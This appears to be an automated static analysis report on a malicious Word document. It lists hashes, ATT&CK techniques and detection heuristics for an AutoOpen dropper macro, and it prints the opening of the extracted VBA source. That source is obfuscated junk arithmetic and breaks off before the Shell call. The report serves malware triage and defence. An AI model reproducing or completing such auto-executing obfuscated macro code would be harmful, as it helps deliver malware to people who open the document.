Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bd492e2cd0f18bf0…

MALICIOUS

Office (OLE)

Size: 122.5 KB
Created: 2018-04-19 18:59:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 752dbb7512d8035e11849fa0d7f488b3
SHA-1: 950618a6e5887cbff4741b4dd0e139579474788b
SHA-256: bd492e2cd0f18bf045ae272d00e3043275c5df7745d3441c1680ceba44a9b68a
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call, indicating an attempt to execute arbitrary commands, likely to download and execute a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6831115-0' further supports this dropper functionality.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6831115-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6831115-0
  • VBA macros detected (medium; 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography: in document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml: in document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 83681 bytes
SHA-256: 13a8cd24e95f5521b0e4815a978b75cfed8b0d972838b63534216ccc91ff7e34
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim BTKahkDrndnkq
BTKahkDrndnkq = 5569 / 9713 / 2444

Dim VSnaQWLcCczQnV
VSnaQWLcCczQnV = 9713 - 6879
Dim NVQHpGkggqK
NVQHpGkggqK = VSnaQWLcCczQnV - BTKahkDrndnkq - 2658857
Dim LCKdDhjgvwPGK
LCKdDhjgvwPGK = 7199 / 5729 / 8482

Dim qHRvGRxQhNFhGJ
qHRvGRxQhNFhGJ = 5729 - 3343
Dim TJWQvfaGSavwlR
TJWQvfaGSavwlR = qHRvGRxQhNFhGJ - LCKdDhjgvwPGK - 73214298
Dim VKPwSwlRbtiZlB
Dim PkfDjmMJiVX
PkfDjmMJiVX = 7733 / 7598 / 5592

Dim jqdbMWadgcVNkh
jqdbMWadgcVNkh = 7598 - 8291
Dim TWHClMfQPnfzQa
TWHClMfQPnfzQa = jqdbMWadgcVNkh - PkfDjmMJiVX - 97752698
VKPwSwlRbtiZlB = 728 / 7315 / 8786
Dim FGWRDVZjPpBg
FGWRDVZjPpBg = 5629 / 9779 / 7075

Dim lTSwgcDbdg
lTSwgcDbdg = 9779 - 4026
Dim BxMGWWrLJwqZ
BxMGWWrLJwqZ = lTSwgcDbdg - FGWRDVZjPpBg - 70422386
Dim gwhqlSajSqxkrk
gwhqlSajSqxkrk = 7097 / 8282 / 7592

Dim drvapqfGgLF
drvapqfGgLF = 8282 - 8416
Dim czlMfgzBBxVF
czlMfgzBBxVF = drvapqfGgLF - gwhqlSajSqxkrk - 49952608

Dim pfwninfrkiZ
pfwninfrkiZ = 9292 / 2579 / 2838

Dim CKbNqbclncbk
CKbNqbclncbk = 2579 - 6879
Dim VgBJZmKTDKQQ
VgBJZmKTDKQQ = CKbNqbclncbk - pfwninfrkiZ - 14108614
Dim zQFCKWvaLrrB
Dim ZBNJvqNziWFFHL
ZBNJvqNziWFFHL = 8231 / 9292 / 1378

Dim vCWPHvJWhism
vCWPHvJWhism = 9292 - 6418
Dim WWNkcpwjBWbXp
WWNkcpwjBWbXp = vCWPHvJWhism - ZBNJvqNziWFFHL - 11469081
Dim VDiMwNamXMbZs
VDiMwNamXMbZs = 6383 / 1594 / 5441

Dim lcLZkcxHtDLHzqnc
lcLZkcxHtDLHzqnc = 1594 - 9562
Dim GbPHPKlwLLBt
GbPHPKlwLLBt = lcLZkcxHtDLHzqnc - VDiMwNamXMbZs - 22657869
zQFCKWvaLrrB = 7315 - 7959
Dim BDZiXcaNgHmpft
BDZiXcaNgHmpft = 3293 / 7320 / 2533

Dim lxwmxFRtchxKR
lxwmxFRtchxKR = 7320 - 1789
Dim fiDhPXrrQKB
fiDhPXrrQKB = lxwmxFRtchxKR - BDZiXcaNgHmpft - 5099288
Dim aVLFWLJMfxPHa
aVLFWLJMfxPHa = 5368 / 6329 / 2368

Dim cszMjKKqKgj
cszMjKKqKgj = 6329 - 6429
Dim gphZWaHHqkCj
gphZWaHHqkCj = cszMjKKqKgj - aVLFWLJMfxPHa - 29836372
Dim MBLvgLigmjSLSc
MBLvgLigmjSLSc = zQFCKWvaLrrB - VKPwSwlRbtiZlB - 44953600
Dim RhdVtHrfbsMBNkcv
RhdVtHrfbsMBNkcv = 6044 / 4552 / 4382

Dim XahLbZfprPJRq
XahLbZfprPJRq = 4552 - 679
Dim ZQdPPXJfcPxBZ
ZQdPPXJfcPxBZ = XahLbZfprPJRq - RhdVtHrfbsMBNkcv - 10738988
Dim cxcFsnDtJGii
cxcFsnDtJGii = 5475 / 5804 / 33

Dim VTxNXPLzQzTQ
VTxNXPLzQzTQ = 5804 - 5420
Dim HgVDCLplKKXn
HgVDCLplKKXn = VTxNXPLzQzTQ - cxcFsnDtJGii - 32977473

Dim WFHNhvWPkSVMJwxh
Dim QGxSnxWBRwKf
QGxSnxWBRwKf = 99 / 1144 / 5538

Dim wFsPaKClrHmxfMZ
wFsPaKClrHmxfMZ = 1144 - 3209
Dim aNCPGnLkrRDZB
aNCPGnLkrRDZB = wFsPaKClrHmxfMZ - QGxSnxWBRwKf - 1099317
WFHNhvWPkSVMJwxh = 4469 / 8485 / 9454
Dim qTPdPrMPvQTRixX
qTPdPrMPvQTRixX = 6671 / 8983 / 9774

Dim HNxCGhfMvNB
HNxCGhfMvNB = 8983 - 2210
Dim cPVsfXSSxmNvT
cPVsfXSSxmNvT = HNxCGhfMvNB - qTPdPrMPvQTRixX - 18361447

Dim nHsqgstWcr
nHsqgstWcr = 7338 / 4001 / 5474

Dim fWmPlRcBDQBCM
fWmPlRcBDQBCM = 4001 - 935
Dim FQZPjPhwiwN
FQZPjPhwiwN = fWmPlRcBDQBCM - nHsqgstWcr - 9621344
Dim BrQBJaLwfgDfvcmw
Dim RLaKxLVgJL
RLaKxLVgJL = 7177 / 6702 / 8416

Dim WMrrnzhrJcp
WMrrnzhrJcp = 6702 - 2815
Dim lqGVNKPhczSl
lqGVNKPhczSl = WMrrnzhrJcp - RLaKxLVgJL - 70552
BrQBJaLwfgDfvcmw = 8485 - 2964
Dim hHbSMLiaKbnWF
Dim tcKXFrhpaH
tcKXFrhpaH = 6505 / 650 / 6186

Dim wKJpWiHPzz
wKJpWiHPzz = 650 - 7351
Dim mbLKfkLRqPScmR
mbLKfkLRqPScmR = wKJpWiHPzz - tcKXFrhpaH - 5304259
hHbSMLiaKbnWF = BrQBJaLwfgDfvcmw - WFHNhvWPkSVMJwxh - 68359671

Dim LgcKsmtRPPaDCX
LgcKsmtRPPaDCX = 3942 / 723 / 1982

Dim nSTqRFmkpjZs
nSTqRFmkpjZs = 723 - 3248
Dim jtrmnvsjFmQtb
jtrmnvsjFmQtb = nSTqRFmkpjZs - LgcKsmtRPPaDCX - 405391

Dim jLpLcPXhKF
Dim RHNBwFGqjfB
RHNBwFGqjfB = 4750 / 494 / 4569

Dim zcGGcXqVCSWdhC
zcGGcXqVCSWdhC = 494 - 2667
Dim qBJrNfSHsBhwr
qBJrNfSHsBhwr = zcGGcXqVCSWdhC - RHNBwFGqjfB - 8670834
jLpLcPXhKF = 6762 / 663 / 406
... (truncated)